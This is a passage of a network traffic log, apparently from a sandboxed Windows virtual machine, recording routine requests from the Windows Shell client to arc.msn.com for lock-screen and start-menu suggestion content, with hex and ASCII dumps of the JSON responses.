12:31:12 GMT Connection: close
2024-12-08 12:31:12 UTC	2299	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 53 75 67 67 65 73 74 69 6f 6e 73 4f 6e 53 74 61 72 74 5c 22 2c 5c 22 70 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 7d 2c 5c 22 70 72 6f 70 65 72 74 69 65 73 5c 22 3a 7b 7d 2c 5c 22 74 72 61 63 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"name\":\"SuggestionsOnStart\",\"propertyManifest\":{},\"properties\":{},\"trac

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.6	49720	20.223.36.55	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:13 UTC	2604	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338387&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241208T123108Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=68f618433d7343ee91702ec990d8faa1&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=619573&metered=false&nettype=ethernet&npid=sc-338387&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&sc-mode=0&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=619573&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1& [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AASp0AqrsC9r/xwFl+z2y2UsBJJfgRDz+895SPUhgR6pcAWcIIP2oJrW+1j3pNyTqKgRupi9+l1kJ+SvaCNMGWfE3cO1gKXxNKCEWczPo11P7s99D0mu8SGlDRLLPM9Mx0hF41kYjjomrPdDZomjT9UrkuKHyTa2lMdMuGh8DCwVmwaOHHA3EEUvZ0kds4UxJFdn7A28+lzZrl4opVyHpcs6tRluUJlzTmpHAcryi7aGuNd2Lg1eVpOSOGqEeqRw0Rx7XgSH5lttOsQd4lOIs4P1GKZE/GpqSa+tC+5pa1uv0S9Au/bTolRfZjx08hfs8hLfG289zNOES14CScPq2tMgQZgAAEELAwAzTUGUV43IS9cSUt6CwAZ5xTWQmNtlbI5yvrvYJoeDM6i2cwWhkErkXIaLcjq73TIdKjP2imZldo5PjlIxcH7jnWIrBQHB5N6oqBC/AOvAr3B9EckkAGJVnp1U8XuiOsWHmc1Svv3Vlc2+nwnIMfGB8YvtWGXBRm9soCCLXYtGi1QiDpUb6hSuyecduMUfRe3wgWg8RRTaVo9VJ4O2P0SfBiFMI3H8GL+E2SlbVob12epGXjSdveoFPe1EuNabu7NSH/abk/F1XuxAqWqreCrITO1J8F9JyOvi+5dWRtV8XTvAVcCpk/jDsuQy9IjipdZVEXDXgPxwO+TTcNSy5u/mXS/p4R7jtRGA955fu6tfG/o0Ijltx+mmBuT9iaS9kvikqQl8kYh4RIOyu7xDPAX9Rh9nGtOYwbmP4P+KXUI2aglfUThAiyek9mKSls8yNMzbH9frwIClkcwY0P4DRwz0igqszKMwQh8cTjiz5t9qMW2xf6+1Ypf30Y8nWKRSpviHkAzCcPn9jvLMCB2PdZeGEx0Dvh0u4iPjedZl7YVkLln+0417uqBSxq/zPGV+aTWsEPBKVvFTRNGVasjBYhtgB&p= Cache-Control: no-cache MS-CV: BIV/rQ3HEUi8aNLi.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-12-08 12:31:14 UTC	815	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 23742 Content-Type: application/json; charset=utf-8 Expires: -1 Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [] X-ARC-SIG: uf9EiyjzGDTv0SON8jVTzKS+bxuyv3itdHYyMeM2I0a/vbWa+GOmz91XBLeQmNNBhkkKCeXdwZs/AID6DaqPh26p7od9yuGQdt9PQBiv+KgVV4UQqRI6Q2OeRVqCvZvDJigDyeUiGtZyDqtYQkr8NMJWrjPzmsOWXU9yHUWJmwmnu9vDuNNgXqR35+JJ9suRs44s8KECzwJIb8R0VaRiG1iC+TE4/nYhjOehKSJtWuVvTAMCag5qS0nt1v9+h5BrqjbasisCEIDojyQJGVQbnu8o4VKBG3DqACoGzsyCcFdgZodyfRsJ8QDx87YMm8Sn7XUthYK9thBAY2lGZn7OYw== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Sun, 08 Dec 2024 12:31:14 GMT Connection: close
2024-12-08 12:31:14 UTC	15569	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 4c 6f 63 6b 53 63 72 65 65 6e 5c 22 2c 5c 22 70 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6c 61 6e 64 73 63 61 70 65 49 6d 61 67 65 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 69 6d 61 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"name\":\"LockScreen\",\"propertyManifest\":{\"landscapeImage\":{\"type\":\"ima
2024-12-08 12:31:14 UTC	8173	IN	Data Raw: 2c 5c 22 72 65 71 75 69 72 65 73 4e 65 74 77 6f 72 6b 5c 22 3a 30 2c 5c 22 72 65 75 73 65 43 6f 75 6e 74 5c 22 3a 2d 31 2c 5c 22 5f 69 6d 70 5c 22 3a 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 5c 2f 61 65 73 5c 2f 63 2e 67 69 66 3f 52 47 3d 31 61 37 30 64 38 66 33 35 38 61 31 34 61 33 63 39 63 64 65 38 62 61 64 34 65 66 62 35 65 63 33 5c 5c 75 30 30 32 36 6d 65 64 3d 31 30 5c 5c 75 30 30 32 36 70 75 62 49 64 3d 32 35 31 39 37 38 35 34 31 5c 5c 75 30 30 32 36 74 69 64 73 3d 31 35 30 30 31 5c 5c 75 30 30 32 36 74 79 70 65 3d 6d 76 5c 5c 75 30 30 32 36 72 65 71 76 65 72 3d 31 2e 30 5c 5c 75 30 30 32 36 54 49 4d 45 3d 7b 44 41 54 45 54 49 4d 45 7d 5c 5c 75 30 30 32 36 61 64 55 6e 69 74 49 64 3d 31 31 37 33 30 35 39 38 5c 5c 75 30 Data Ascii: ,\"requiresNetwork\":0,\"reuseCount\":-1,\"_imp\":\"https:\/\/www.bing.com\/aes\/c.gif?RG=1a70d8f358a14a3c9cde8bad4efb5ec3\\u0026med=10\\u0026pubId=251978541\\u0026tids=15001\\u0026type=mv\\u0026reqver=1.0\\u0026TIME={DATETIME}\\u0026adUnitId=11730598\\u0

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.6	49719	20.223.36.55	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:13 UTC	2587	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=280815&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241208T123108Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=274a5ff7be2541a3a38cb45b9f69a84d&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=619573&metered=false&nettype=ethernet&npid=sc-280815&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=619573&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waas [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAfs5GOX61lVM8UnUOWdIeg/DUKLjZdbZ80HPE+KG0CZg1HHuvFd/HVDp4/sYdYYGDv0Dfq9A2zc5btmMURBMu0e/948OQ3yFE6rvyf+nT5sTGTGA0qpPnPKlgAnX8SHKgwxUD5fjLnELL4hCV9O03UVxeLA16Darc/N64dlJereDvVoSr3zrS5ui1o97pjJ3soR6U4/kvFX2zVqANP1MKyXciMzNUd9wFKN57fw4/tfq6JULpep0i/+orwdesl7HrLwIQmw4XBm6X9Q2hDsNDAU+xZqwgCissp40y+nJfJHmEzcOeTSI1sfavR1kX+nuk6oGhwp9HCs9l3WzMoaI5SIQZgAAEOLsCLdV6rZjmXnijNY8jKOwAdE7DCijWuf/WBoztPmdquMFBiDxXB1uA9fNDylpqpb9xUnEluECm3UW8jo0OwWKNGUQUHteZoVw0cj47il+h0pg7ALIrmbuQiGZb7UR2ECsHcjN7Ck44Ce12quBBnewyzNU8+GkNx9+3GIcs3XcrVDSTS9yaK5cGTEFUQCBHT5kLgZaGrXt6GVnlC4MTzyRyddShvWqiWpFKUzbsOJLBL3rJQlf6Ycr+n8Ga0nFypPwsvxQdjwx0Y93FfwBCGNDZxSDomrzsdMG1o2aIEVNqrE2aJQDgJnDt1ATq1UgrcrLICyNUlHIeWRDDwLCz5665unqoR2NXvb+uT07UZVCePKDyVFvuazus01S/4C5Jia+YKk+eukkRaIevorFUlNIo7T0dG5kKL5WcXk4/uAf5P6o/KQgkhlUj8y15kjDOvz6dT1n0bkolb8Gvzv6z4TMhSX95JfmRgKK2wkWFrIXl2/G/nN+CTYkmODrVgFh2Fcs3jxMrsQJV1H6daDFnSl6LAA5IVylKiovi+fd7uSgxu/Riml2Xr/+YvcqOPVg0H535w8i25leBTFPm3CBnet8N9gB&p= Cache-Control: no-cache MS-CV: BIV/rQ3HEUi8aNLi.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-12-08 12:31:14 UTC	955	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 2939 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"RADIDS":"1,P425116123-T1-C128000000001627409+B+P20+S1"},{"OPTOUTSTATE":"65792"},{"REGIONALPOLICY":"1"}] X-ARC-SIG: CBIUUDBZfNLgIuQRxnIfSeCAS/RYTF2H2WeG9yzR/eZLevP84fV3fj7eiSmmHtlM4DfO09I81DERShP7IxDk+XxTOLNHvFwtDhO4N00Giox0rV43NQv548/+2tolLjCBsfEZr8EJq1+JtH9uj+LEf7WgWkSeukx4Zerv4l9DWSy5ySXrvvXDpIFQugG2jKnLEwn6rYlyD1BzNAyJkuJmhyHk7PKI7b8ZLFuSenZRqQASKsguTNqzMNH7Ht0FgTkRJwWJ/M0SaFhZcfTC/ZFkHi0NqxArzJgXyeRSZ5KSnCf5UhuPZPzQU/n/HkT+uTxJ1a47kKfzlqc3Pfn9mnnMDQ== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Sun, 08 Dec 2024 12:31:14 GMT Connection: close
2024-12-08 12:31:14 UTC	2939	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 69 74 65 6d 50 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6e 6f 4f 70 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 61 63 74 69 6f 6e 5c 22 7d 7d 2c 5c 22 69 74 65 6d 73 5c 22 3a 5b 7b 5c 22 70 72 6f 70 65 72 74 69 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"itemPropertyManifest\":{\"noOp\":{\"type\":\"action\"}},\"items\":[{\"properti

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.6	49721	20.223.36.55	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:15 UTC	2607	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338388&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241208T123113Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=9aa11aaba26140b9a54dc9f3611abfef&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=619573&metered=false&nettype=ethernet&npid=sc-338388&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=619573&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: cid=99999999&chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AASp0AqrsC9r/xwFl+z2y2UsBJJfgRDz+895SPUhgR6pcAWcIIP2oJrW+1j3pNyTqKgRupi9+l1kJ+SvaCNMGWfE3cO1gKXxNKCEWczPo11P7s99D0mu8SGlDRLLPM9Mx0hF41kYjjomrPdDZomjT9UrkuKHyTa2lMdMuGh8DCwVmwaOHHA3EEUvZ0kds4UxJFdn7A28+lzZrl4opVyHpcs6tRluUJlzTmpHAcryi7aGuNd2Lg1eVpOSOGqEeqRw0Rx7XgSH5lttOsQd4lOIs4P1GKZE/GpqSa+tC+5pa1uv0S9Au/bTolRfZjx08hfs8hLfG289zNOES14CScPq2tMgQZgAAEELAwAzTUGUV43IS9cSUt6CwAZ5xTWQmNtlbI5yvrvYJoeDM6i2cwWhkErkXIaLcjq73TIdKjP2imZldo5PjlIxcH7jnWIrBQHB5N6oqBC/AOvAr3B9EckkAGJVnp1U8XuiOsWHmc1Svv3Vlc2+nwnIMfGB8YvtWGXBRm9soCCLXYtGi1QiDpUb6hSuyecduMUfRe3wgWg8RRTaVo9VJ4O2P0SfBiFMI3H8GL+E2SlbVob12epGXjSdveoFPe1EuNabu7NSH/abk/F1XuxAqWqreCrITO1J8F9JyOvi+5dWRtV8XTvAVcCpk/jDsuQy9IjipdZVEXDXgPxwO+TTcNSy5u/mXS/p4R7jtRGA955fu6tfG/o0Ijltx+mmBuT9iaS9kvikqQl8kYh4RIOyu7xDPAX9Rh9nGtOYwbmP4P+KXUI2aglfUThAiyek9mKSls8yNMzbH9frwIClkcwY0P4DRwz0igqszKMwQh8cTjiz5t9qMW2xf6+1Ypf30Y8nWKRSpviHkAzCcPn9jvLMCB2PdZeGEx0Dvh0u4iPjedZl7YVkLln+0417uqBSxq/zPGV+aTWsEPBKVvFTRNGVasjBYhtgB&p= Cache-Control: no-cache MS-CV: BIV/rQ3HEUi8aNLi.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-12-08 12:31:16 UTC	814	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 3892 Content-Type: application/json; charset=utf-8 Expires: -1 Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [] X-ARC-SIG: YA2yk1N3dEuuUmPKbwpZOWX0foxX4R0AYFCJQgZKBMZAiftWM9IVFnuDtMs5A6XWY6TA+XtVvYA0y9Pbp1K5uRrzfZELfAYsBf5SDE8BLMEQoEg0XDySrCdURL4/6BHZ4gF/2YAZOPlmxVDP6qv9rSymxRz0HsXLo6gnKPaGwYwxAX1pR8yR2cgfyql7xh/b2h7+IzUT7SiKVtBBIT7KcJmDsWa8k+AzfqvOCN0PRUnPZdZLbEO8g7SsUpyzLNTQ47f2zu/X1kAafV7Mu0nNRVXbdfFjbYX9XfCZFT11uRZxmkCpTOaCy6w6FGEXoJc5NaXeOpPL306htvZ8vBb2eg== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Sun, 08 Dec 2024 12:31:15 GMT Connection: close
2024-12-08 12:31:16 UTC	3892	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 53 75 67 67 65 73 74 69 6f 6e 73 4f 6e 53 74 61 72 74 5c 22 2c 5c 22 70 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 7d 2c 5c 22 70 72 6f 70 65 72 74 69 65 73 5c 22 3a 7b 7d 2c 5c 22 74 72 61 63 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"name\":\"SuggestionsOnStart\",\"propertyManifest\":{},\"properties\":{},\"trac

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.6	49722	20.223.36.55	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:16 UTC	2610	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=280815&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241208T123114Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=8a7cfe7c99e7412b82dc03b702c89e2c&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=619573&metered=false&nettype=ethernet&npid=sc-280815&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=619573&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waas [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: cid=128000000001627409&chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AASp0AqrsC9r/xwFl+z2y2UsBJJfgRDz+895SPUhgR6pcAWcIIP2oJrW+1j3pNyTqKgRupi9+l1kJ+SvaCNMGWfE3cO1gKXxNKCEWczPo11P7s99D0mu8SGlDRLLPM9Mx0hF41kYjjomrPdDZomjT9UrkuKHyTa2lMdMuGh8DCwVmwaOHHA3EEUvZ0kds4UxJFdn7A28+lzZrl4opVyHpcs6tRluUJlzTmpHAcryi7aGuNd2Lg1eVpOSOGqEeqRw0Rx7XgSH5lttOsQd4lOIs4P1GKZE/GpqSa+tC+5pa1uv0S9Au/bTolRfZjx08hfs8hLfG289zNOES14CScPq2tMgQZgAAEELAwAzTUGUV43IS9cSUt6CwAZ5xTWQmNtlbI5yvrvYJoeDM6i2cwWhkErkXIaLcjq73TIdKjP2imZldo5PjlIxcH7jnWIrBQHB5N6oqBC/AOvAr3B9EckkAGJVnp1U8XuiOsWHmc1Svv3Vlc2+nwnIMfGB8YvtWGXBRm9soCCLXYtGi1QiDpUb6hSuyecduMUfRe3wgWg8RRTaVo9VJ4O2P0SfBiFMI3H8GL+E2SlbVob12epGXjSdveoFPe1EuNabu7NSH/abk/F1XuxAqWqreCrITO1J8F9JyOvi+5dWRtV8XTvAVcCpk/jDsuQy9IjipdZVEXDXgPxwO+TTcNSy5u/mXS/p4R7jtRGA955fu6tfG/o0Ijltx+mmBuT9iaS9kvikqQl8kYh4RIOyu7xDPAX9Rh9nGtOYwbmP4P+KXUI2aglfUThAiyek9mKSls8yNMzbH9frwIClkcwY0P4DRwz0igqszKMwQh8cTjiz5t9qMW2xf6+1Ypf30Y8nWKRSpviHkAzCcPn9jvLMCB2PdZeGEx0Dvh0u4iPjedZl7YVkLln+0417uqBSxq/zPGV+aTWsEPBKVvFTRNGVasjBYhtgB&p= Cache-Control: no-cache MS-CV: BIV/rQ3HEUi8aNLi.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-12-08 12:31:16 UTC	955	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 2968 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"RADIDS":"1,P425116123-T1-C128000000001627409+B+P20+S1"},{"OPTOUTSTATE":"65792"},{"REGIONALPOLICY":"1"}] X-ARC-SIG: couC35Ezh/XBC37biVwCJ74s7BRsnSpLLejhh4e9WltPa1Au0esJoxZQbxpAYBOP8dv89VuaivpjWi5upS4c/FzpRyr+yl4JSHkV2Q7SWWxTobRtC5ERJWJSX10yZeNfPG3l+MjddBkGrd6igRXfwFuEY1oWjQZDb5WMpXz0FSiNHSA2JE3nooRTKS/Q8V5uHE8fbWZWZsjeblj9mooxymtSvenhkj01BaaJSRId7IT6prOTEjfGSwa3iyacApk2pn7xA9ktDE5mKaY7fGjLVbr2JXJVE9/VIUHpOGT+KFZLzy327iCkRlEGTNGWLmLmIMEciKh3Bb5J9M0bTOsFyw== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, 